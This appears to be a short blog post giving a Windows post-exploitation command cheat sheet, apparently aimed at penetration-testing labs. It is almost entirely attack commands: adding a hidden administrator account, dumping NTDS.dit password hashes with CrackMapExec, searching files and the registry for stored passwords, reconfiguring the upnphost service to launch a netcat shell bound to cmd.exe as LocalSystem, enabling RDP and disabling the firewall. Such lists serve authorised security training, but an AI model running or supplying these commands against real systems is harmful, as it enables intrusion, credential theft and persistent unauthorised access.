Windows Post Exploitation

What to do when you have either a standard user or SYSTEM user in Windows. This is to help in either priv escalation if needed but more so to gather and enumerate as much information about the machine as possible!!

net user sp00ks sp00ks /add
net localgroup administrators sp00ks /add 
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

systeminfo - Check for hotfixes installed?

NTDS.dit dump using Crackmapexec
cme smb -u USERNAME -p 'PASSWORD' -d 'DOMAIN' --ntds --exec-method smbexec

findstr /s /n /i /p /c:"password" *.txt
netsh firewall show state

schtasks /query /fo LIST /v

tasklist /SVC


wmic qfe get Caption,Description,HotFixID,InstalledOn

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
accesschk.exe -ucqv Spooler
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -ucqv SSDPSRV
accesschk.exe -ucqv upnphost

sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost

dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

type %WINDIR%\System32\drivers\etc\hosts
net user
net groups
net accounts /domain
cd C:\ & dir /S "proof.txt"
cd C:\ & dir /S "network-secret.txt"
netstat -pantob TCP
netstat -pantob UDP
start cmd.exe /k notepad.exe
Enable RDP
reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

Disable/Enable Firewall - Win XP/2003
netsh firewall set opmode mode=DISABLE 
netsh firewall set opmode mode=ENABLE

Check the firewall logs if exist?

View all listening service 
netstat -an |find /i "listening"

OS Name?
OS Version?
System Type?
Schedulted Tasks? (run 'at')
Password Policy? (net accounts /domain)
Hosts file output? (type %WINDIR%\System32\drivers\etc\hosts)
Firewall rules? (netsh advfirewall firewall)

No comments:

Post a Comment